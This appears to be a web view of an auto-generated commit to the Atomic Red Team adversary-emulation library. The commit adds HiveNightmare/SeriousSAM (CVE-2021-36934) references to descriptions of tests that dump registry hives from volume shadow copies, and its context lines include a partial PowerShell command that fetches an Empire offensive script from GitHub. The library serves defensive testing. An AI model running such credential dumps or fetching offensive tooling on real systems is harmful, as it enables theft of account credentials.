security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2022-11-10 16:59:20 +00:00
parent 956a699a65
commit 2a798d98d1
2 changed files with 6 additions and 6 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/index.yaml
+3 -3
View File
@@ -73867,8 +73867,8 @@ credential-access:
- name: dump volume shadow copy hives with certutil
auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7
description: |
Dump hives from volume shadow copies with the certutil utility
This can be done with a non-admin user account
Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM".
This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
supported_platforms:
- windows
input_arguments:
@@ -73899,7 +73899,7 @@ credential-access:
rm $toremove -ErrorAction Ignore
- name: dump volume shadow copy hives with System.IO.File
auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
description: 'Dump hives from volume shadow copies with System.IO.File
description: 'Dump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
'
supported_platforms:
atomics/T1003.002/T1003.002.md
+3 -3
View File
@@ -224,8 +224,8 @@ Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1b
<br/>
## Atomic Test #5 - dump volume shadow copy hives with certutil
Dump hives from volume shadow copies with the certutil utility
This can be done with a non-admin user account
Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM".
This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
**Supported Platforms:** Windows
@@ -270,7 +270,7 @@ rm $toremove -ErrorAction Ignore
<br/>
## Atomic Test #6 - dump volume shadow copy hives with System.IO.File
Dump hives from volume shadow copies with System.IO.File
Dump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
**Supported Platforms:** Windows